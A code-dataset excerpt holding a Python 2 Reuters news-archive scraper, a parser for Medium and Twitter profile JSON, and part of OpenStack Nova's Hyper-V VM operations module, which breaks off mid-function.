| apache-2.0 | -875,346,721,671,318,700 | 35.763889 | 80 | 0.69286 | false | 4.471284 | false | false | false |
divir94/News-Analytics | Divir/Scraping/scrape_articles.py | 1 | 10543 | # -*- coding: utf8 -*-
# scraping
import urllib2
from goose import Goose
from bs4 import BeautifulSoup
# db
import shelve
# time/timeout
import signal
from datetime import *
from contextlib import contextmanager
from time import time
# others
import itertools
import sys
from pprint import pprint
from collections import OrderedDict
"""
articles_dict
key: date (yymmdd) i.e. 20070701
value: dict with key: val -> url: (title, text)
"""
""" ------------- Generic Scraping ---------------"""
# html
def get_html(url):
""""given a url returns html"""
try:
html = urllib2.urlopen(url).read()
return html
except urllib2.HTTPError, e:
print "URL broke: %s" % url
return None
# tags
def find_tags(html, tag_name, class_name=False, a_tag=False):
""""find tags using beautifulsoup,
options: use a class name, get anchor tags"""
soup = BeautifulSoup(html)
# get tag with class if specified
if class_name: tags = soup.findAll(tag_name, { "class" : class_name })
else: tags = soup.findAll(tag_name)
# get anchor tag if specified
if a_tag: tags = [link.find("a")["href"] for link in tags]
return tags
# article
def get_article(url):
"""get article title and text using goose"""
g = Goose()
article = g.extract(url=url)
title = article.title
text = article.cleaned_text
return (title, text)
class TimeoutException(Exception): pass
def timeout(fun, limit, *args ):
@contextmanager
def time_limit(seconds):
def signal_handler(signum, frame):
raise TimeoutException, "Timed out!"
signal.signal(signal.SIGALRM, signal_handler)
signal.alarm(seconds)
try: yield
finally: signal.alarm(0)
try:
with time_limit(limit):
return fun(*args)
except TimeoutException, msg:
print "Function timed out\n"
return ("", "")
""" ----------------- Helper ------------------"""
def dates_in_interval(start_date, end_date):
""" Returns list of calender dates in interval"""
diff = end_date - start_date
dates = [ start_date + timedelta(i) for i in range(diff.days + 1) ]
return dates
# for date in dates_in_range(date(2014,6,15), date(2014,7,15)): print date
def store_num_articles(start_date, end_date):
dates = dates_in_range(start_date, end_date)
num_dates = len(dates)
total_articles = 0
temp_dict = dict()
# 1
main_dict = shelve.open("../Data/num_articles")
dates_stored = [date for date in main_dict]
main_dict.close()
for i in range(num_dates):
date = str(dates[i])
if date in dates_stored:
print "Date: %s in dict" % date
continue
try:
articles_list = timeout(article_links_on_date, 5, date)
if isinstance(articles_list, list):
num_articles = len(articles_list)
total_articles += num_articles
temp_dict[str(date)] = num_articles
print "Date: %s, Num articles: %s" % ( date, num_articles )
except: "\nFailed to get articles list on date %s\n" % date
# write to dict
if i%20 == 0:
main_dict = shelve.open("../Data/num_articles")
main_dict.update(temp_dict)
main_dict.close()
temp_dict = dict()
print "\nSuccessfully updated dict, date: %s\n" % ( date )
print "\nTotal articles: %s" % total_articles
def print_num_articles():
d = shelve.open("../Data/num_articles")
total_articles = 0
missing_dates = []
calender_dates = dates_in_range( date(2007,1,1), date(2014,7,26) )
ordered_dict = OrderedDict((datetime.strftime(datetime.strptime(k , '%Y-%m-%d'), '%Y-%m-%d'), v)
for k, v in sorted(d.iteritems()))
# print ordered dates in dict
for my_date, num_articles in ordered_dict.items():
total_articles += num_articles
print "Date: %s, Num articles: %s" % ( my_date, num_articles )
print "\nNum dates on calender: %d" % len(calender_dates)
print "Num dates stored: %d" % len(ordered_dict)
print "Total articles: %d" % total_articles
# print and get missing dates
print "\nMissing dates:"
for my_date in calender_dates:
if str(my_date) not in d:
print my_date
d[str(my_date)] = len(article_links_on_date(my_date))
d.close()
# print_num_articles()
""" --------------- Scraper Class ---------------"""
class ArticleScraper():
def __init__(self, date, print_details=True):
self.date = date
self.date_str = str(date)
self.path_to_data = "../Data/Articles/"
self.reuters_article_links = [] # total articles on reuters
self.corrupted_keys = [] # failed to read key from db
self.pre_stored_links = [] # already stored in db and title not empty
self.stored_links = [] # stored in current process
self.crashed_links = [] # DB or Goose crashed while extracting
self.empty_links = [] # Goose returned w/ empty title
self.empty_db_links = []
self.print_details = print_details
def get_article_links(self):
"""
:return: List of article urls for a given date
"""
reuters_date_format = self.date_str.replace("-","")
url = "http://www.reuters.com/resources/archive/us/%s.html" % reuters_date_format
html = get_html(url)
# all links includes articles + video
all_links = find_tags(html, 'div', 'headlineMed', a_tag=True)
# remove video links
self.reuters_article_links = [link for link in all_links if 'video' not in str(link)]
return self.reuters_article_links
def get_pre_stored_links(self, details=False):
"""
:return: List of stored articles for a given date
"""
main_db = shelve.open(self.path_to_data + self.date_str, 'r')
for link in main_db:
try:
title, text = main_db[link]
if title and text:
self.log_link(link, "prestored-log", title, details)
else:
self.log_link(link, "empty-db", title)
except:
self.log_link(link, "corrupted-key")
main_db.close()
return self.pre_stored_links
def store_article(self, link, temp_dict):
"""
:param temp_dict: temp dict to update main db
:return: Store and log article
"""
try: title, text = timeout(get_article, 5, link)
except:
self.log_link(link, "crashed")
return
if title:
temp_dict[link] = ( title, text )
self.log_link(link, "stored", title)
else: self.log_link(link, "empty")
def log_link(self, link, status, title="", details=True):
"""
:return: Store links in resp dict and print if asked
"""
if self.print_details and details: print "Status: %s, %s, %s" % (status, link, title)
if status == "crashed":
self.crashed_links.append(link)
elif status == "empty":
self.empty_links.append(link)
elif status == "stored":
self.stored_links.append(link)
elif status == "prestored-log":
self.pre_stored_links.append(link)
elif status == "pprestored-nolog": pass
elif status == "corrupted-key":
self.corrupted_keys.append(link)
elif status == "empty-db":
self.empty_db_links.append(link)
def update_main_db(self, temp_dict):
"""
:return: Update main db with temp dict to prevent corruption of db
"""
main_db = shelve.open(self.path_to_data + self.date_str, 'c')
main_db.update(temp_dict)
main_db.close()
def print_read_results(self):
"""
:return: Print results after reading db
"""
if self.print_details:
print "\n\nCorrupted keys:"
for link in self.corrupted_keys: print link
print "\n\nEmpty db links:"
for link in self.empty_db_links: print link
print "\nReuter's: %d" % len(self.get_article_links())
print "Pre-stored: %d" % len(self.pre_stored_links)
print "Empty: %d" % len(self.empty_db_links)
print "Corrupted keys: %d" % len(self.corrupted_keys)
def print_store_results(self):
"""
:return: Print results after updating db
"""
if self.print_details:
print "\nEmpty articles:"
for link in self.empty_links: print link
print "\nCrashed articles:"
for link in self.crashed_links: print link
print "\nReuter's: %d" % len(self.reuters_article_links)
print "Stored: %d" % len(self.stored_links)
print "Crashed: %d" % len(self.crashed_links)
print "Empty: %d" % len(self.empty_links)
def test_link(self, link):
title, text = get_article(link)
print title
print text
def run_read(self):
"""
:return: Print articles in db
"""
print "\n\nDate: %s" % self.date_str
self.get_pre_stored_links(details=True)
self.print_read_results()
def run_store(self):
"""
:return: Update main db with temp dict to prevent corruption of db
"""
print "Date: %s" % self.date_str
start_time = time()
temp_dict = dict()
article_links = self.get_article_links()
num_articles = len(article_links)
pre_stored_articles = self.get_pre_stored_links()
# store, log and update main db
for i in range(num_articles):
link = article_links[i]
# check if already stored
if link in pre_stored_articles:
self.log_link(link, "prestored-nolog")
continue
# store and log
self.store_article(link, temp_dict)
# open and update main db, clear temp dict
if i%20 == 0:
self.update_main_db(temp_dict)
if self.print_details: print "\nSuccessfully updated dict, i: %d, num links: %d\n" % ( i, num_articles)
# print results
self.print_store_results()
print "Time taken: %s sec" % str(time() - start_time)
""" ------------- Main ---------------"""
for i in range(3,4):
my_date = date(2014,7,i)
scraper = ArticleScraper(my_date, False)
scraper.run_read() | apache-2.0 | 1,659,297,324,422,557,700 | 31.244648 | 119 | 0.572987 | false | 3.656955 | false | false | false |
lifei96/Medium_Crawler | User_Crawler/util_parser.py | 2 | 2683 | # -*- coding: utf-8 -*-
import json
def user_parser(file_path):
with open(file_path, 'r') as f:
raw_data = json.load(f)
data = dict()
data['username'] = raw_data['profile']['user']['username']
if 'socialStats' in raw_data['profile']['user']:
data['followers'] = raw_data['profile']['user']['socialStats']['usersFollowedByCount']
data['following'] = raw_data['profile']['user']['socialStats']['usersFollowedCount']
else:
data['followers'] = len(raw_data['followers'])
data['following'] = len(raw_data['following'])
data['lastPostCreatedAt'] = raw_data['profile']['user']['lastPostCreatedAt']
data['createdAt'] = raw_data['profile']['user']['createdAt']
data['postsInMonthlyTop100'] = raw_data['profile']['postsInMonthlyTop100']
if 'twitterScreenName' not in raw_data['profile']['user'] or raw_data['profile']['user']['twitterScreenName'] == '':
data['twitter'] = 0
else:
data['twitter'] = 1
if 'facebookAccountId' not in raw_data['profile']['user'] or raw_data['profile']['user']['facebookAccountId'] == '':
data['facebook'] = 0
else:
data['facebook'] = 1
if raw_data['profile']['user']['bio'] == '':
data['bio'] = 0
else:
data['bio'] = 1
data['posts'] = len(raw_data['latest'])
data['highlights'] = len(raw_data['highlights'])
data['responses'] = len(raw_data['responses'])
data['recommends'] = len(raw_data['recommends'])
data['authorTags'] = len(raw_data['profile']['authorTags'])
data['collections'] = len(raw_data['profile']['collections'])
data['topAuthorTags'] = len(raw_data['profile']['topAuthorTags'])
data['interestTags'] = len(raw_data['profile']['interestTags'])
return data
def twitter_parser(file_path):
data = dict()
data['twitter_followers'] = ''
data['twitter_friends'] = ''
data['twitter_listed'] = ''
data['twitter_statuses'] = ''
data['twitter_favourites'] = ''
data['twitter_description'] = ''
if file_path == '':
return data
with open(file_path, 'r') as f:
raw_data = json.load(f)
if 'profile_user' in raw_data:
raw_data = raw_data['profile_user']
else:
return data
data['twitter_followers'] = raw_data['followers_count']
data['twitter_friends'] = raw_data['friends_count']
data['twitter_listed'] = raw_data['listed_count']
data['twitter_statuses'] = raw_data['statuses_count']
data['twitter_favourites'] = raw_data['favourites_count']
if raw_data['description'] == '':
data['twitter_description'] = 0
else:
data['twitter_description'] = 1
return data
| mit | -755,214,441,095,604,200 | 38.455882 | 120 | 0.600447 | false | 3.601342 | false | false | false |
openstack/nova | nova/virt/hyperv/vmops.py | 2 | 50873 | # Copyright (c) 2010 Cloud.com, Inc
# Copyright 2012 Cloudbase Solutions Srl
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Management class for basic VM operations.
"""
import contextlib
import functools
import os
import time
from eventlet import timeout as etimeout
from os_win import constants as os_win_const
from os_win import exceptions as os_win_exc
from os_win import utilsfactory
from oslo_concurrency import processutils
from oslo_log import log as logging
from oslo_service import loopingcall
from oslo_utils import excutils
from oslo_utils import fileutils
from oslo_utils import units
from oslo_utils import uuidutils
from nova.api.metadata import base as instance_metadata
from nova.compute import vm_states
import nova.conf
from nova import exception
from nova.i18n import _
from nova import objects
from nova.objects import fields
from nova import version
from nova.virt import configdrive
from nova.virt import hardware
from nova.virt.hyperv import block_device_manager
from nova.virt.hyperv import constants
from nova.virt.hyperv import imagecache
from nova.virt.hyperv import pathutils
from nova.virt.hyperv import serialconsoleops
from nova.virt.hyperv import vif as vif_utils
from nova.virt.hyperv import volumeops
LOG = logging.getLogger(__name__)
CONF = nova.conf.CONF
SHUTDOWN_TIME_INCREMENT = 5
REBOOT_TYPE_SOFT = 'SOFT'
REBOOT_TYPE_HARD = 'HARD'
VM_GENERATIONS = {
constants.IMAGE_PROP_VM_GEN_1: constants.VM_GEN_1,
constants.IMAGE_PROP_VM_GEN_2: constants.VM_GEN_2
}
VM_GENERATIONS_CONTROLLER_TYPES = {
constants.VM_GEN_1: constants.CTRL_TYPE_IDE,
constants.VM_GEN_2: constants.CTRL_TYPE_SCSI
}
def check_admin_permissions(function):
@functools.wraps(function)
def wrapper(self, *args, **kwds):
# Make sure the windows account has the required admin permissions.
self._vmutils.check_admin_permissions()
return function(self, *args, **kwds)
return wrapper
class VMOps(object):
# The console log is stored in two files, each should have at most half of
# the maximum console log size.
_MAX_CONSOLE_LOG_FILE_SIZE = units.Mi / 2
_ROOT_DISK_CTRL_ADDR = 0
def __init__(self, virtapi=None):
self._virtapi = virtapi
self._vmutils = utilsfactory.get_vmutils()
self._metricsutils = utilsfactory.get_metricsutils()
self._vhdutils = utilsfactory.get_vhdutils()
self._hostutils = utilsfactory.get_hostutils()
self._migrutils = utilsfactory.get_migrationutils()
self._pathutils = pathutils.PathUtils()
self._volumeops = volumeops.VolumeOps()
self._imagecache = imagecache.ImageCache()
self._serial_console_ops = serialconsoleops.SerialConsoleOps()
self._block_dev_man = (
block_device_manager.BlockDeviceInfoManager())
self._vif_driver = vif_utils.HyperVVIFDriver()
def list_instance_uuids(self):
instance_uuids = []
for (instance_name, notes) in self._vmutils.list_instance_notes():
if notes and uuidutils.is_uuid_like(notes[0]):
instance_uuids.append(str(notes[0]))
else:
LOG.debug("Notes not found or not resembling a GUID for "
"instance: %s", instance_name)
return instance_uuids
def list_instances(self):
return self._vmutils.list_instances()
def get_info(self, instance):
"""Get information about the VM."""
LOG.debug("get_info called for instance", instance=instance)
instance_name = instance.name
if not self._vmutils.vm_exists(instance_name):
raise exception.InstanceNotFound(instance_id=instance.uuid)
info = self._vmutils.get_vm_summary_info(instance_name)
state = constants.HYPERV_POWER_STATE[info['EnabledState']]
return hardware.InstanceInfo(state=state)
def _create_root_device(self, context, instance, root_disk_info, vm_gen):
path = None
if root_disk_info['type'] == constants.DISK:
path = self._create_root_vhd(context, instance)
self.check_vm_image_type(instance.uuid, vm_gen, path)
root_disk_info['path'] = path
def _create_root_vhd(self, context, instance, rescue_image_id=None):
is_rescue_vhd = rescue_image_id is not None
base_vhd_path = self._imagecache.get_cached_image(context, instance,
rescue_image_id)
base_vhd_info = self._vhdutils.get_vhd_info(base_vhd_path)
base_vhd_size = base_vhd_info['VirtualSize']
format_ext = base_vhd_path.split('.')[-1]
root_vhd_path = self._pathutils.get_root_vhd_path(instance.name,
format_ext,
is_rescue_vhd)
root_vhd_size = instance.flavor.root_gb * units.Gi
try:
if CONF.use_cow_images:
LOG.debug("Creating differencing VHD. Parent: "
"%(base_vhd_path)s, Target: %(root_vhd_path)s",
{'base_vhd_path': base_vhd_path,
'root_vhd_path': root_vhd_path},
instance=instance)
self._vhdutils.create_differencing_vhd(root_vhd_path,
base_vhd_path)
vhd_type = self._vhdutils.get_vhd_format(base_vhd_path)
if vhd_type == constants.DISK_FORMAT_VHD:
# The base image has already been resized. As differencing
# vhdx images support it, the root image will be resized
# instead if needed.
return root_vhd_path
else:
LOG.debug("Copying VHD image %(base_vhd_path)s to target: "
"%(root_vhd_path)s",
{'base_vhd_path': base_vhd_path,
'root_vhd_path': root_vhd_path},
instance=instance)
self._pathutils.copyfile(base_vhd_path, root_vhd_path)
root_vhd_internal_size = (
self._vhdutils.get_internal_vhd_size_by_file_size(
base_vhd_path, root_vhd_size))
if not is_rescue_vhd and self._is_resize_needed(
root_vhd_path, base_vhd_size,
root_vhd_internal_size, instance):
self._vhdutils.resize_vhd(root_vhd_path,
root_vhd_internal_size,
is_file_max_size=False)
except Exception:
with excutils.save_and_reraise_exception():
if self._pathutils.exists(root_vhd_path):
self._pathutils.remove(root_vhd_path)
return root_vhd_path
def _is_resize_needed(self, vhd_path, old_size, new_size, instance):
if new_size < old_size:
raise exception.FlavorDiskSmallerThanImage(
flavor_size=new_size, image_size=old_size)
elif new_size > old_size:
LOG.debug("Resizing VHD %(vhd_path)s to new "
"size %(new_size)s",
{'new_size': new_size,
'vhd_path': vhd_path},
instance=instance)
return True
return False
def _create_ephemerals(self, instance, ephemerals):
for index, eph in enumerate(ephemerals):
eph['format'] = self._vhdutils.get_best_supported_vhd_format()
eph_name = "eph%s" % index
eph['path'] = self._pathutils.get_ephemeral_vhd_path(
instance.name, eph['format'], eph_name)
self.create_ephemeral_disk(instance.name, eph)
def create_ephemeral_disk(self, instance_name, eph_info):
self._vhdutils.create_dynamic_vhd(eph_info['path'],
eph_info['size'] * units.Gi)
@staticmethod
def _get_vif_metadata(context, instance_id):
vifs = objects.VirtualInterfaceList.get_by_instance_uuid(context,
instance_id)
vif_metadata = []
for vif in vifs:
if 'tag' in vif and vif.tag:
device = objects.NetworkInterfaceMetadata(
mac=vif.address,
bus=objects.PCIDeviceBus(),
tags=[vif.tag])
vif_metadata.append(device)
return vif_metadata
def _save_device_metadata(self, context, instance, block_device_info):
"""Builds a metadata object for instance devices, that maps the user
provided tag to the hypervisor assigned device address.
"""
metadata = []
metadata.extend(self._get_vif_metadata(context, instance.uuid))
if block_device_info:
metadata.extend(self._block_dev_man.get_bdm_metadata(
context, instance, block_device_info))
if metadata:
instance.device_metadata = objects.InstanceDeviceMetadata(
devices=metadata)
def set_boot_order(self, instance_name, vm_gen, block_device_info):
boot_order = self._block_dev_man.get_boot_order(
vm_gen, block_device_info)
LOG.debug("Setting boot order for instance: %(instance_name)s: "
"%(boot_order)s", {'instance_name': instance_name,
'boot_order': boot_order})
self._vmutils.set_boot_order(instance_name, boot_order)
@check_admin_permissions
def spawn(self, context, instance, image_meta, injected_files,
admin_password, network_info, block_device_info=None):
"""Create a new VM and start it."""
LOG.info("Spawning new instance", instance=instance)
instance_name = instance.name
if self._vmutils.vm_exists(instance_name):
raise exception.InstanceExists(name=instance_name)
# Make sure we're starting with a clean slate.
self._delete_disk_files(instance_name)
vm_gen = self.get_image_vm_generation(instance.uuid, image_meta)
self._block_dev_man.validate_and_update_bdi(
instance, image_meta, vm_gen, block_device_info)
root_device = block_device_info['root_disk']
self._create_root_device(context, instance, root_device, vm_gen)
self._create_ephemerals(instance, block_device_info['ephemerals'])
try:
with self.wait_vif_plug_events(instance, network_info):
# waiting will occur after the instance is created.
self.create_instance(instance, network_info, root_device,
block_device_info, vm_gen, image_meta)
# This is supported starting from OVS version 2.5
self.plug_vifs(instance, network_info)
self._save_device_metadata(context, instance, block_device_info)
if configdrive.required_by(instance):
configdrive_path = self._create_config_drive(context,
instance,
injected_files,
admin_password,
network_info)
self.attach_config_drive(instance, configdrive_path, vm_gen)
self.set_boot_order(instance.name, vm_gen, block_device_info)
# vifs are already plugged in at this point. We waited on the vif
# plug event previously when we created the instance. Skip the
# plug vifs during power on in this case
self.power_on(instance,
network_info=network_info,
should_plug_vifs=False)
except Exception:
with excutils.save_and_reraise_exception():
self.destroy(instance, network_info, block_device_info)
@contextlib.contextmanager
def wait_vif_plug_events(self, instance, network_info):
timeout = CONF.vif_plugging_timeout
try:
# NOTE(claudiub): async calls to bind the neutron ports will be
# done when network_info is being accessed.
events = self._get_neutron_events(network_info)
with self._virtapi.wait_for_instance_event(
instance, events, deadline=timeout,
error_callback=self._neutron_failed_callback):
yield
except etimeout.Timeout:
# We never heard from Neutron
LOG.warning('Timeout waiting for vif plugging callback for '
'instance.', instance=instance)
if CONF.vif_plugging_is_fatal:
raise exception.VirtualInterfaceCreateException()
except exception.PortBindingFailed:
LOG.warning(
"Neutron failed to bind a port to this host. Make sure that "
"an L2 agent is alive and registered from this node (neutron "
"Open vSwitch agent or Hyper-V agent), or make sure that "
"neutron is configured with a mechanism driver that is able "
"to bind ports to this host (OVN). If you are using neutron "
"Hyper-V agent, make sure that networking-hyperv is installed "
"on the neutron controller, and that the neutron-server was "
"configured to use the 'hyperv' mechanism_driver.")
raise
def _neutron_failed_callback(self, event_name, instance):
LOG.error('Neutron Reported failure on event %s',
event_name, instance=instance)
if CONF.vif_plugging_is_fatal:
raise exception.VirtualInterfaceCreateException()
def _get_neutron_events(self, network_info):
# NOTE(danms): We need to collect any VIFs that are currently
# down that we expect a down->up event for. Anything that is
# already up will not undergo that transition, and for
# anything that might be stale (cache-wise) assume it's
# already up so we don't block on it.
if CONF.vif_plugging_timeout:
return [('network-vif-plugged', vif['id'])
for vif in network_info if vif.get('active') is False]
return []
def create_instance(self, instance, network_info, root_device,
block_device_info, vm_gen, image_meta):
instance_name = instance.name
instance_path = os.path.join(CONF.instances_path, instance_name)
secure_boot_enabled = self._requires_secure_boot(instance, image_meta,
vm_gen)
memory_per_numa_node, cpus_per_numa_node = (
self._get_instance_vnuma_config(instance, image_meta))
if memory_per_numa_node:
LOG.debug("Instance requires vNUMA topology. Host's NUMA spanning "
"has to be disabled in order for the instance to "
"benefit from it.", instance=instance)
if CONF.hyperv.dynamic_memory_ratio > 1.0:
LOG.warning(
"Instance vNUMA topology requested, but dynamic memory "
"ratio is higher than 1.0 in nova.conf. Ignoring dynamic "
"memory ratio option.", instance=instance)
dynamic_memory_ratio = 1.0
vnuma_enabled = True
else:
dynamic_memory_ratio = CONF.hyperv.dynamic_memory_ratio
vnuma_enabled = False
if instance.pci_requests.requests:
# NOTE(claudiub): if the instance requires PCI devices, its
# host shutdown action MUST be shutdown.
host_shutdown_action = os_win_const.HOST_SHUTDOWN_ACTION_SHUTDOWN
else:
host_shutdown_action = None
self._vmutils.create_vm(instance_name,
vnuma_enabled,
vm_gen,
instance_path,
[instance.uuid])
self._vmutils.update_vm(instance_name,
instance.flavor.memory_mb,
memory_per_numa_node,
instance.flavor.vcpus,
cpus_per_numa_node,
CONF.hyperv.limit_cpu_features,
dynamic_memory_ratio,
host_shutdown_action=host_shutdown_action,
chassis_asset_tag=version.product_string())
self._configure_remotefx(instance, vm_gen)
self._vmutils.create_scsi_controller(instance_name)
self._attach_root_device(instance_name, root_device)
self._attach_ephemerals(instance_name, block_device_info['ephemerals'])
self._volumeops.attach_volumes(
block_device_info['block_device_mapping'], instance_name)
# For the moment, we use COM port 1 when getting the serial console
# log as well as interactive sessions. In the future, the way in which
# we consume instance serial ports may become configurable.
#
# Note that Hyper-V instances will always have 2 COM ports
serial_ports = {
constants.DEFAULT_SERIAL_CONSOLE_PORT:
constants.SERIAL_PORT_TYPE_RW}
self._create_vm_com_port_pipes(instance, serial_ports)
for vif in network_info:
LOG.debug('Creating nic for instance', instance=instance)
self._vmutils.create_nic(instance_name,
vif['id'],
vif['address'])
if CONF.hyperv.enable_instance_metrics_collection:
self._metricsutils.enable_vm_metrics_collection(instance_name)
self._set_instance_disk_qos_specs(instance)
if secure_boot_enabled:
certificate_required = self._requires_certificate(image_meta)
self._vmutils.enable_secure_boot(
instance.name, msft_ca_required=certificate_required)
self._attach_pci_devices(instance)
def _attach_pci_devices(self, instance):
for pci_request in instance.pci_requests.requests:
spec = pci_request.spec[0]
for counter in range(pci_request.count):
self._vmutils.add_pci_device(instance.name,
spec['vendor_id'],
spec['product_id'])
def _get_instance_vnuma_config(self, instance, image_meta):
"""Returns the appropriate NUMA configuration for Hyper-V instances,
given the desired instance NUMA topology.
:param instance: instance containing the flavor and it's extra_specs,
where the NUMA topology is defined.
:param image_meta: image's metadata, containing properties related to
the instance's NUMA topology.
:returns: memory amount and number of vCPUs per NUMA node or
(None, None), if instance NUMA topology was not requested.
:raises exception.InstanceUnacceptable:
If the given instance NUMA topology is not possible on Hyper-V, or
if CPU pinning is required.
"""
instance_topology = hardware.numa_get_constraints(instance.flavor,
image_meta)
if not instance_topology:
# instance NUMA topology was not requested.
return None, None
memory_per_numa_node = instance_topology.cells[0].memory
cpus_per_numa_node = len(instance_topology.cells[0].cpuset)
# TODO(stephenfin): We can avoid this check entirely if we rely on the
# 'supports_pcpus' driver capability (via a trait), but we need to drop
# support for the legacy 'vcpu_pin_set' path in the libvirt driver
# first
if instance_topology.cpu_policy not in (
None, fields.CPUAllocationPolicy.SHARED,
):
raise exception.InstanceUnacceptable(
reason=_("Hyper-V does not support CPU pinning."),
instance_id=instance.uuid)
# validate that the requested NUMA topology is not asymetric.
# e.g.: it should be like: (X cpus, X cpus, Y cpus), where X == Y.
# same with memory.
for cell in instance_topology.cells:
if len(cell.cpuset) != cpus_per_numa_node:
reason = _("Hyper-V does not support NUMA topologies with "
"uneven number of processors. (%(a)s != %(b)s)") % {
'a': len(cell.cpuset), 'b': cpus_per_numa_node}
raise exception.InstanceUnacceptable(reason=reason,
instance_id=instance.uuid)
if cell.memory != memory_per_numa_node:
reason = _("Hyper-V does not support NUMA topologies with "
"uneven amounts of memory. (%(a)s != %(b)s)") % {
'a': cell.memory, 'b': memory_per_numa_node}
raise exception.InstanceUnacceptable(reason=reason,
instance_id=instance.uuid)
return memory_per_numa_node, cpus_per_numa_node
def _configure_remotefx(self, instance, vm_gen):
extra_specs = instance.flavor.extra_specs
remotefx_max_resolution = extra_specs.get(
constants.FLAVOR_ESPEC_REMOTEFX_RES)
if not remotefx_max_resolution:
# RemoteFX not required.
return
if not CONF.hyperv.enable_remotefx:
raise exception.InstanceUnacceptable(
_("enable_remotefx configuration option needs to be set to "
"True in order to use RemoteFX."))
if not self._hostutils.check_server_feature(
self._hostutils.FEATURE_RDS_VIRTUALIZATION):
raise exception.InstanceUnacceptable(
_("The RDS-Virtualization feature must be installed in order "
"to use RemoteFX."))
if not self._vmutils.vm_gen_supports_remotefx(vm_gen):
raise exception.InstanceUnacceptable(
_("RemoteFX is not supported on generation %s virtual "
"machines on this version of Windows.") % vm_gen)
instance_name = instance.name
LOG.debug('Configuring RemoteFX for instance: %s', instance_name)
remotefx_monitor_count = int(extra_specs.get(
constants.FLAVOR_ESPEC_REMOTEFX_MONITORS) or 1)
remotefx_vram = extra_specs.get(
constants.FLAVOR_ESPEC_REMOTEFX_VRAM)
vram_bytes = int(remotefx_vram) * units.Mi if remotefx_vram else None
self._vmutils.enable_remotefx_video_adapter(
instance_name,
remotefx_monitor_count,
remotefx_max_resolution,
vram_bytes)
def _attach_root_device(self, instance_name, root_dev_info):
if root_dev_info['type'] == constants.VOLUME:
self._volumeops.attach_volume(root_dev_info['connection_info'],
instance_name,
disk_bus=root_dev_info['disk_bus'])
else:
self._attach_drive(instance_name, root_dev_info['path'],
root_dev_info['drive_addr'],
root_dev_info['ctrl_disk_addr'],
root_dev_info['disk_bus'],
root_dev_info['type'])
def _attach_ephemerals(self, instance_name, ephemerals):
for eph in ephemerals:
# if an ephemeral doesn't have a path, it might have been removed
# during resize.
if eph.get('path'):
self._attach_drive(
instance_name, eph['path'], eph['drive_addr'],
eph['ctrl_disk_addr'], eph['disk_bus'],
constants.BDI_DEVICE_TYPE_TO_DRIVE_TYPE[
eph['device_type']])
def _attach_drive(self, instance_name, path, drive_addr, ctrl_disk_addr,
controller_type, drive_type=constants.DISK):
if controller_type == constants.CTRL_TYPE_SCSI:
self._vmutils.attach_scsi_drive(instance_name, path, drive_type)
else:
self._vmutils.attach_ide_drive(instance_name, path, drive_addr,
ctrl_disk_addr, drive_type)
def get_image_vm_generation(self, instance_id, image_meta):
default_vm_gen = self._hostutils.get_default_vm_generation()
image_prop_vm = image_meta.properties.get('hw_machine_type',
default_vm_gen)
if image_prop_vm not in self._hostutils.get_supported_vm_types():
reason = _('Requested VM Generation %s is not supported on '
'this OS.') % image_prop_vm
raise exception.InstanceUnacceptable(instance_id=instance_id,
reason=reason)
return VM_GENERATIONS[image_prop_vm]
def check_vm_image_type(self, instance_id, vm_gen, root_vhd_path):
if (vm_gen != constants.VM_GEN_1 and root_vhd_path and
self._vhdutils.get_vhd_format(
root_vhd_path) == constants.DISK_FORMAT_VHD):
reason = _('Requested VM Generation %s, but provided VHD '
'instead of VHDX.') % vm_gen
raise exception.InstanceUnacceptable(instance_id=instance_id,
reason=reason)
def _requires_certificate(self, image_meta):
os_type = image_meta.properties.get('os_type')
if os_type == fields.OSType.WINDOWS:
return False
return True
def _requires_secure_boot(self, instance, image_meta, vm_gen):
"""Checks whether the given instance requires Secure Boot.
Secure Boot feature will be enabled by setting the "os_secure_boot"
image property or the "os:secure_boot" flavor extra spec to required.
:raises exception.InstanceUnacceptable: if the given image_meta has
no os_type property set, or if the image property value and the
flavor extra spec value are conflicting, or if Secure Boot is
required, but the instance's VM generation is 1.
"""
img_secure_boot = image_meta.properties.get('os_secure_boot')
flavor_secure_boot = instance.flavor.extra_specs.get(
constants.FLAVOR_SPEC_SECURE_BOOT)
requires_sb = False
conflicting_values = False
if flavor_secure_boot == fields.SecureBoot.REQUIRED:
requires_sb = True
if img_secure_boot == fields.SecureBoot.DISABLED:
conflicting_values = True
elif img_secure_boot == fields.SecureBoot.REQUIRED:
requires_sb = True
if flavor_secure_boot == fields.SecureBoot.DISABLED:
conflicting_values = True
if conflicting_values:
reason = _(
"Conflicting image metadata property and flavor extra_specs "
"values: os_secure_boot (%(image_secure_boot)s) / "
"os:secure_boot (%(flavor_secure_boot)s)") % {
'image_secure_boot': img_secure_boot,
'flavor_secure_boot': flavor_secure_boot}
raise exception.InstanceUnacceptable(instance_id=instance.uuid,
reason=reason)
if requires_sb:
if vm_gen != constants.VM_GEN_2:
reason = _('Secure boot requires generation 2 VM.')
raise exception.InstanceUnacceptable(instance_id=instance.uuid,
reason=reason)
os_type = image_meta.properties.get('os_type')
if not os_type:
reason = _('For secure boot, os_type must be specified in '
'image properties.')
raise exception.InstanceUnacceptable(instance_id=instance.uuid,
reason=reason)
return requires_sb
def _create_config_drive(self, context, instance, injected_files,
admin_password, network_info, rescue=False):
if CONF.config_drive_format != 'iso9660':
raise exception.ConfigDriveUnsupportedFormat(
format=CONF.config_drive_format)
LOG.info('Using config drive for instance', instance=instance)
extra_md = {}
if admin_password and CONF.hyperv.config_drive_inject_password:
extra_md['admin_pass'] = admin_password
inst_md = instance_metadata.InstanceMetadata(
instance, content=injected_files, extra_md=extra_md,
network_info=network_info)
configdrive_path_iso = self._pathutils.get_configdrive_path(
instance.name, constants.DVD_FORMAT, rescue=rescue)
LOG.info('Creating config drive at %(path)s',
{'path': configdrive_path_iso}, instance=instance)
with configdrive.ConfigDriveBuilder(instance_md=inst_md) as cdb:
try:
cdb.make_drive(configdrive_path_iso)
except processutils.ProcessExecutionError as e:
with excutils.save_and_reraise_exception():
LOG.error('Creating config drive failed with '
'error: %s', e, instance=instance)
if not CONF.hyperv.config_drive_cdrom:
configdrive_path = self._pathutils.get_configdrive_path(
instance.name, constants.DISK_FORMAT_VHD, rescue=rescue)
processutils.execute(CONF.hyperv.qemu_img_cmd,
